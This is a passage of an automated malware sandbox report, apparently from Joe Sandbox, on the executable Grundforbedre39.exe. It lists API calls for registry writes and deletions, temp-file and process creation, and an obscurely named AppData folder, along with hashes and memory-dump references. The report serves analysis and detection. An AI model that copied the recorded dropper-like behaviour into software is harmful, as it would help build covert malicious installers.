                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountTick$wsprintf
                                                                                      • String ID: ... %d%%
                                                                                      • API String ID: 551687249-2449383134
                                                                                      • Opcode ID: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                                                                      • Instruction ID: d56137d6e4a505209b2495a9ad0e903af7b2eaecc34ac4602261a913104377f3
                                                                                      • Opcode Fuzzy Hash: 684f5030c79bc3ddb9bb75536ee51c67afbd92a3f7865a882cb7187bdb02bce5
                                                                                      • Instruction Fuzzy Hash: 95517A71900219ABCB10CF65D944BAF3FA8AB08766F14457BE911BB2C1C7789E50CBED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040237B Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 956 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 963 4023c7-4023cf 956->963 964 402a4c-402a5b 956->964 965 4023d1-4023de call 402bbf lstrlenW 963->965 966 4023e2-4023e5 963->966 965->966 969 4023f5-4023f8 966->969 970 4023e7-4023f4 call 402ba2 966->970 974 402409-40241d RegSetValueExW 969->974 975 4023fa-402404 call 403027 969->975 970->969 977 402422-4024fc RegCloseKey 974->977 978 40241f 974->978 975->974 977->964 981 40281e-402825 977->981 978->977 981->964
                                                                                      APIs
                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsoA79F.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp
                                                                                      • API String ID: 1356686001-2234505353
                                                                                      • Opcode ID: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
                                                                                      • Instruction ID: 604b722b9c55a9196ccdb8bc5d46c0fd7c9d49ef9fceb37282f2360b7a100841
                                                                                      • Opcode Fuzzy Hash: 90e2c532cef6f7d866fc85d66413cbe16e3cd5261a2574de0a4410d976b13d76
                                                                                      • Instruction Fuzzy Hash: 1B11AE71E00108BFEB10AFA4DE89EAE767CEB54358F10403AF904B61D1D6B85E419628
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405C1E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 982 405c1e-405c2a 983 405c2b-405c5f GetTickCount GetTempFileNameW 982->983 984 405c61-405c63 983->984 985 405c6e-405c70 983->985 984->983 987 405c65 984->987 986 405c68-405c6b 985->986 987->986
                                                                                      APIs
                                                                                      • GetTickCount.KERNEL32 ref: 00405C3C
                                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Grundforbedre39.exe",00403268,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403492), ref: 00405C57
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C23
                                                                                      • nsa, xrefs: 00405C2B
                                                                                      • "C:\Users\user\Desktop\Grundforbedre39.exe", xrefs: 00405C1E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountFileNameTempTick
                                                                                      • String ID: "C:\Users\user\Desktop\Grundforbedre39.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                      • API String ID: 1716503409-2103450607
                                                                                      • Opcode ID: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                                      • Instruction ID: a4e54dcc62cd1b6bfc855809a1f33464b5edbff741e4ba4f72954512b04b2574
                                                                                      • Opcode Fuzzy Hash: b475e38dea5fb3e2c0bd2ffad844489a64f4d901e003652483f57aed9986a0af
                                                                                      • Instruction Fuzzy Hash: 58F09076B04204BBEB009F5ADD49ADFB7ACEB91710F10403AF900E7190E2B0AE44CB64
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00402BFF Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402C20
                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402C5C
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C65
                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C8A
                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402CA8
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                      • String ID:
                                                                                      • API String ID: 1912718029-0
                                                                                      • Opcode ID: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                                                                      • Instruction ID: 13aa261ecf2a86817b53105e55b29f339a5543dfd3ea7b5a0579e289bf8829aa
                                                                                      • Opcode Fuzzy Hash: fdbde4e884f383338cc21de88dd7407a01aefe671536b7f53bbd552f7ed090ed
                                                                                      • Instruction Fuzzy Hash: 04116A71908118FFEF119F90DE8CEAE3B79FB14384F100476FA05A11A0D3B49E52AA69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,00001020), ref: 100022B8
                                                                                        • Part of subcall function 10002645: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1146159756.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1146123851.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146198520.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1146237766.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_10000000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                      • String ID:
                                                                                      • API String ID: 1791698881-3916222277
                                                                                      • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                      • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                      • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                      • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Timeout
                                                                                      • String ID: !
                                                                                      • API String ID: 1777923405-2657877971
                                                                                      • Opcode ID: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                                      • Instruction ID: a86adb03786c756a90e8c754dee758adf3648459c58847ecf436330ca9d5af9c
                                                                                      • Opcode Fuzzy Hash: 8e95b372dd1f90357ee07302f12d9dd43e1fde52ce919f1a5202f9c54fc75036
                                                                                      • Instruction Fuzzy Hash: B121B071944209BEEF01AFB0CE4AABE7B75EB40304F10403EF601B61D1D6B89A40DB69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405EE7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F11
                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F32
                                                                                      • RegCloseKey.ADVAPI32(?,?,0040615A,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F55
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValue
                                                                                      • String ID: Call
                                                                                      • API String ID: 3677997916-1824292864
                                                                                      • Opcode ID: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                      • Instruction ID: 1229758a71a34d9b3841ebc19c7c3eba7c9bd897b4c963cc492d8629085b1b1e
                                                                                      • Opcode Fuzzy Hash: c3918b15ec2dd140c4f3d1bafefc28aadc87a0cff0ebfff7b8d124f540ee4f6a
                                                                                      • Instruction Fuzzy Hash: B9011E3255020AEADF21CF55ED09EDB3BA9EF55350F004036F905D6160D335D964DFA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00401E66 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000,?), ref: 004051B1
                                                                                        • Part of subcall function 00405179: lstrlenW.KERNEL32(00403160,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00000000,0040FEA0,00000000,?,?,?,?,?,?,?,?,?,00403160,00000000), ref: 004051C1
                                                                                        • Part of subcall function 00405179: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,00403160), ref: 004051D4
                                                                                        • Part of subcall function 00405179: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsoA79F.tmp\System.dll), ref: 004051E6
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040520C
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405226
                                                                                        • Part of subcall function 00405179: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405234
                                                                                        • Part of subcall function 004056FA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                                        • Part of subcall function 004056FA: CloseHandle.KERNEL32(?), ref: 00405730
                                                                                      • WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E95
                                                                                      • WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401EAA
                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                      • String ID:
                                                                                      • API String ID: 3585118688-0
                                                                                      • Opcode ID: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
                                                                                      • Instruction ID: 19c395d66568059f601410a6cc42e832bf6643a8327f7d33ffb52a85e02cf26d
                                                                                      • Opcode Fuzzy Hash: 7b08a6d90b05bbed925343c6248fd7a4a37af617971c498a8cfedcd14d37eb6c
                                                                                      • Instruction Fuzzy Hash: FF11A131900108EBCF21AFA1CC849DE7A76EB44314F204037F605B61E1C7798E81DB9E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004015B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(?,?,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,?,00405AED,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,dyrskuer\Jowl109\cytomegalic\gibbon\gangsterfilmen\vrdiheftets.bon,75B23420,?,C:\Users\user\AppData\Local\Temp\,0040582B,?,75B23420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405A87
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405A8C
                                                                                        • Part of subcall function 00405A79: CharNextW.USER32(00000000), ref: 00405AA4
                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00401612
                                                                                        • Part of subcall function 00405648: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040568B
                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb,?,00000000,?), ref: 00401645
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb, xrefs: 00401638
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                      • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Afskrkkelsesvaabnet84\Fodboldenke\biltyven\Subfastigiate\Felaheen\Tilb
                                                                                      • API String ID: 1892508949-2699030423
                                                                                      • Opcode ID: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
                                                                                      • Instruction ID: c4264af60da0efacfc01d1487171d30b62475a562f2de0234080d29f7ac7759b
                                                                                      • Opcode Fuzzy Hash: 50f3ce724175e93cf5c6c72f007c2b38a77747b88a25ec32c8f5577a88bf2d41
                                                                                      • Instruction Fuzzy Hash: 5611B631504504EBCF206FA5CD4199F3AB1EF54368B240A3BF946B61F1D63E4A81DE5E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 004056FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004256F0,Error launching installer), ref: 00405723
                                                                                      • CloseHandle.KERNEL32(?), ref: 00405730
                                                                                      Strings
                                                                                      • Error launching installer, xrefs: 0040570D
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000465000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1133176820.0000000000467000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Grundforbedre39.jbxd
                                                                                      Similarity
                                                                                      • API ID: CloseCreateHandleProcess
                                                                                      • String ID: Error launching installer
                                                                                      • API String ID: 3712363035-66219284
                                                                                      • Opcode ID: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                                      • Instruction ID: 962493b9a5858e12d65c81fa64705238b81a3a8385349ca8c6d0e9dfe3a178e2
                                                                                      • Opcode Fuzzy Hash: 9acc92e2c7281f73b30f5830c9ca17af0a7e84f9092cfe2fe3dcf761661325f9
                                                                                      • Instruction Fuzzy Hash: 55E0BFB4A00209BFEB109F64ED05F7B76BCE714604F804521BE15F6190D7B4A8118A79
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00406B17 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1132844226.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1132810286.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132879796.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1132912550.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
